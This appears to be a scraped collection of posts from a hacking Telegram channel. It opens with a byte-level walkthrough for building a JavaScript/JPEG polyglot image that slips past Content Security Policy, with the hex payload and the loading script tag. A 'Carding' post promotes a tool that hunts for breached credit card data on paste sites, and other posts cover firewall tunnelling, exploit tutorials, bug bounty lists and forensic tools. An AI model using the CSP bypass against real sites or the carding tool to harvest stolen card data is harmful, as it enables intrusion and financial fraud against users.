#Promotion FREE PRO ACCOUNTS


SOME SHITS SELL THOSE 🤣🤣

@PremiumHostTG

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMPORTANT FOR IMAGE PAYLOADs a real trick #ForExperts Bypassing CSP using polyglot JPEGs :

🦑THE CHALLENGE :

> James challenged me to see whether a JavaScript / JPEG polyglot could be created. Doing so will allow me to bypass CSP on almost every website that hosts images posted from the same domain.

>I happily took up the task, and began to analyze the structure. A current non-ASCII JavaScript vector 0xFF 0xD8 0xFF 0xE0 is the first four Bits. The next two bytes then specify the JPEG header length. If we use the bytes 0x2F 0x2A as header frequency, as you might guess we have a non-ASCII variable followed by a multi-line JavaScript comment. We then have to pad out the JPEG header to the length of 0x2F2A with nulls. Here's what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

1️⃣Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

2️⃣0xFF 0xFE is the comment header 0x00 0x1C specifies the length of the comment then the rest is our JavaScript payload which is of course */=alert("Burp rocks.")/*

3️⃣Next we need to close the comment on JavaScript, I edited the last four bytes of the image data before the image marker ends. This is what the file end looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker.

4️⃣Nice so our JPEG polyglot is here, actually not yet. When using a UTF-8 character set for the text it corrupts our polyglot when it is used as a file, it works well if you do not require a charset except on Firefox! On MDN it does not say that the charset attribute is provided by the script but does. So you need to specify the ISO-8859-1 charset on the script tag to get the script to work

> It's worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

🦑The code to execute the image as JavaScript is as follows:

<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>

5️⃣I tried to post this image as a photo of the phpBB profile but it does have restrictions. There is a limit on file size of 6k and a fixed resolution of 90x90. By cropping, I reduced the size of the logo and pondered how I could reduce the JPEG data.In the JPEG header I use /* which in hex is 0x2F and 0x2A, combined 0x2F2A which results in a length of 12074 which is a lot of padding and will result in a graphic far too big to fit as a profile picture. Looking at the ASCII table I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header whilst still being recognised as a valid JPEG file.

6️⃣The smallest starting byte I could find was 0x9 (a tab character) followed by 0x3A (a colon) which results in a combined hex value of 0x093A (2362) that shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash 0x2F instead of the NULL character at the end of the JFIF identifier and an asterisk as the version number. Here's what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A

7️⃣Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

8️⃣If you allow users to upload JPEGs, these uploads are on the same domain as your app, and your CSP allows script from "self", you can bypass the CSP using a polyglot JPEG by injecting a script and pointing it to that image.

Share us❤️👍🏻
powered by wiki & written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share :

T.me/UndercodeTesting
T.me/UndercodeHacking
T.me/UndercodeSecurity

:)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Carding : 2020- find Breached Credit Cards Information


> THE TOOL SEARCH IN breached credit card details avaliable on the following 17 Websites:-

* cl1p.net
* dpaste
* dumpz.org
* hastebin
* ideone
* pastebin
* pw.fabian-fingerle.de
* gist.github.com
* heypasteit.com
* ivpaste.com
* mysticpaste.com
* paste.org.ru
* paste2.org
* sebsauvage.net/paste/
* slexy.org
* squadedit.com
* wklej.se
* textsnip.com

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/itsmehacker/CardPwn.git

2️⃣cd CardPwn

3️⃣pip3 install -r requirements.txt

🦑Tested On

Kali L
Ubuntu
Nethunter

> This tool is a Proof of Concept and is for Educational Purposes Only.


Share us❤️👍🏻
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑httptunnel is free software :
>This can be useful for users behind restrictive firewalls. If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/larsbrinkhoff/httptunnel.git

2️⃣cd httptunnel

3️⃣./autogen.sh

4️⃣ some examples:

1) start httptunnel server:
At host REMOTE, start hts like this:
hts -F localhost:23 8888 (set up httptunnel server to listen on port 8888 and forward to localhost:23)

2) start httptunnel client:
At host LOCAL, start htc like this:
htc -F 2323 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 (set up httptunnel client to forward localhost:2323 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000)

3) or, if using a buffering HTTP proxy:
htc -F 2323 -P PROXY_ADDRESS:8000 -B 48K REMOTE_IP:8888


4) Now you can do this at host LOCAL:
telnet localhost 2323 (telnet in to REMOTE_IP:8888 via your httptunnel you just configured above on port localhost:2323)
...and you will hopefully get a login prompt from host REMOTE_IP.
Debugging:

5) For debug output, add -Dn to the end of a command, where n is the level of debug output you'd like to see, with 0 meaning no debug messages at all, and 5 being the highest level (verbose).

»ex: htc -F 10001 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 -D5 will show verbose debug output (level 5 debugging) while setting up an httptunnel client to forward localhost:10001 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000

5️⃣Example sites :

> https://sergvergara.files.wordpress.com/2011/04/http_tunnel.pdf - excellent httptunnel tutorial, examples, & info

> http://sebsauvage.net/punching/ - another excellent example

> https://daniel.haxx.se/docs/sshproxy.html - more useful info

> http://neophob.com/2006/10/gnu-httptunnel-v33-windows-binaries/ - httptunnel Win32 binaries (dl)

> Google search for "http tunnel v3.3" - brings up lots of good links to httptunnel (this search seems to work better than searching for "httptunnel" alone since the latter brings up many generic search results or results pertaining to other tools)

✅Topic git
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hacking Topic 2020 #Platforms :

- [YesWeHack](https://yeswehack.com/)
- [intigriti](https://intigriti.com/)
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://bugcrowd.com/)
- [Cobalt](https://cobalt.io/)
- [Bountysource](https://www.bountysource.com/)
- [Bounty Factory](https://bountyfactory.io/)
- [Coder Bounty](http://www.coderbounty.com/)
- [FreedomSponsors](https://freedomsponsors.org/)
- [FOSS Factory](http://www.fossfactory.org/)
- [Synack](https://www.synack.com/)
- [HackenProof](https://hackenproof.com/)
- [Detectify](https://cs.detectify.com/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hacktrophy](https://hacktrophy.com/)
- [AntiHACK](https://www.antihack.me/)
- [CESPPA](https://www.cesppa.com/)

Share us❤️👍🏻
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Bug Bounty Tutorials & practice sources 2020 :

- How to Become a Successful Bug Bounty Hunter

- Researcher Resources - How to become a Bug Bounty Hunter

- Bug Bounties 101

- The life of a bug bounty hunter

- Awsome list of bugbounty cheatsheets

- Getting Started - Bug Bounty Hunter Methodology


✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Available Bug Bounty Programs

- 123Contact Form
- 99designs
- Abacus
- Acquia
- ActiveCampaign
- ActiveProspect
- Adobe
- AeroFS
- Airbitz
- Airbnb
- Algolia
- Altervista
- Altroconsumo
- Amara
- Amazon Web Services
- Amazon.com
- ANCILE Solutions Inc.
- Anghami
- ANXBTC
- Apache httpd
- Appcelerator
- Apple
- Apptentive
- Aptible
- Ardour
- Arkane
- ARM mbed
- Asana
- ASP4all
- AT&T
- Atlassian


✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑EXPLOIT COURSES & TUTORIALS 2020 :


https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/

https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/

https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/

https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/

https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/

https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/

https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/

https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/

https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/

https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/

https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/

https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/

https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/

https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/

ENJOY
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Topic Linux tools + functions :


[Belkasoft Evidence Center](https://belkasoft.com/ec)
The toolkit will quickly extract digital evidence from multiple sources by analyzing hard drives, drive images, memory dumps, iOS, Blackberry and Android backups, UFED, JTAG and chip-off dumps.


CimSweep - Suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows.

[CIRTkit](https://github.com/byt3smith/CIRTKit) - CIRTKit is not just a collection of tools, but also a framework to aid in the ongoing unification of Incident Response and Forensics investigation processes.

Cyber Triage - Cyber Triage remotely collects and analyzes endpoint data to help determine if it is compromised. It’s agentless approach and focus on ease of use and automation allows companies to respond without major infrastructure changes and without a team of forensics experts. Its results are used to decide if the system should be erased or investigated further.

[Digital Forensics Framework](http://www.arxsys.fr/discover/) - Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigations and perform incident response.

Doorman - osquery fleet manager that allows remote management of osquery configurations retrieved by nodes. It takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.

[Envdb](https://github.com/mephux/envdb) - Envdb turns your production, dev, cloud, etc environments into a database cluster you can search using osquery as the foundation. It wraps the osquery process with a (cluster) node agent that can communicate back to a central location.

Falcon Orchestrator - Extendable Windows-based application that provides workflow automation, case management and security response functionality.

[GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics. It consists of a python agent (client) that is installed on target systems, and a python server infrastructure that can manage and talk to the agent. Besides the included Python API client, [PowerGRR](https://github.com/swisscom/PowerGRR) provides an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.

Kolide Fleet - State of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.

[Limacharlie](https://github.com/refractionpoint/limacharlie) - Endpoint security platform composed of a collection of small projects all working together that gives you a cross-platform (Windows, OSX, Linux, Android and iOS) low-level environment for managing and pushing additional modules into memory to extend its functionality.

MozDef - Automates the security incident handling process and facilitate the real-time activities of incident handlers.


Enjoy ❤️👍🏻
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Process #Dump Tools 2020

[Microsoft User Mode Process Dumper](http://www.microsoft.com/en-us/download/details.aspx?id=4060) - Dumps any running Win32 processes memory image on the fly.


PMDump - Tool that lets you dump the memory contents of a process to a file without stopping the process.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

windows login meth

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 bulk_extractor :
Computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. Because of ignoring the file system structure, the program distinguishes itself in terms of speed and thoroughness.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/simsong/bulk_extractor.git

2️⃣cd bulk_extractor

3️⃣ ./configure

4️⃣make

5️⃣make install

🦑For windows :

 : http://digitalcorpora.org/downloads/bulk_extractor

2️⃣click to install :))

🦑Try using ASan:

1️⃣ make gitfixup # brings every submodule to master
CXXFLAGS="-fsanitize=address" ./configure # Runs with ASan (requires clang & libasan to be installed)

2️⃣- Run -E with all of the scanners one-by-one with ASan to find scanner-specific bugs. Currently there seems to be a bug in email in the histogram generation process and in scanhex

3️⃣To keep bulkextractor and its submodules current with the latest code on GitHub, type:

4️⃣ cd to the bulkextractor directory

5️⃣make pull

🦑Compiling Notes

1️⃣ bulkextractor builds with the GNU auto tools.

2️⃣We recommend compiling bulkextractor with -O3 and that is the

> default. You can disable all optimization flags by specifying the
configure option --with-noopt.

➕for more usage https://github.com/simsong/bulk\extractor/wiki/Installing-bulk_extractor

Share us❤️👍🏻
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Log #Analysis #Tools 2020

[AppCompatProcessor](https://github.com/mbevilacqua/appcompatprocessor) - AppCompatProcessor has been designed to extract additional value from enterprise-wide AppCompat / AmCache data beyond the classic stacking and grepping techniques.

Lorg - Tool for advanced HTTPD logfile security analysis and forensics.

[Logdissect](https://github.com/dogoncouch/logdissect) - CLI utility and Python API for analyzing log files and other data.

Sigma - Generic signature format for SIEM systems already containing an extensive ruleset.

[StreamAlert](https://github.com/airbnb/streamalert) - Serverless, real-time log data analysis framework, capable of ingesting custom data sources and triggering alerts using user-defined logic.

SysmonSearch - SysmonSearch makes Windows event log analysis more effective and less time consuming by aggregation of event logs.

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑German court ruled that Facebook is required to comply with the regulatory order: restrict its collection of user data
#News

> The German Federal Court ruled on Tuesday that Facebook must comply with an order issued by the German antitrust regulator to restrict the collection of user data, which was a setback for the company. The Federal Court issued a stay of execution order, suspending a lower court ruling in support of the Federal Cartel Office’s original view that Facebook abused its market dominance and collected users without permission. information.

>"I am happy with this ruling." Andreas Mundt, chairman of the Federal Cartel Office, said that the reason was that it "if data is collected and used illegally, it should be possible to take antitrust actions to prevent Market power is abused."

>Facebook said there is no direct relationship between this latest ruling and the appeal process that is continuing. The company said: "We will continue to defend our position that we are not engaged in antitrust abuse. For German individuals or companies using our products and services, there will be no immediate changes."

>Germany has been at the forefront of the global boycott of Facebook, and the company is facing increasing criticism that its platform is used to spread false information about politics.

>The German Federal Court stated in its ruling that it did not object to the conclusion of the cartel office that Facebook abused its market dominance and that the company’s use of data was not fully approved by users.


@UndercodeNews
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#FastTip best App Repackaging Detectors 2020

>FSquaDRA - a tool for detection of repackaged Android applications based on app resources hash comparison.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁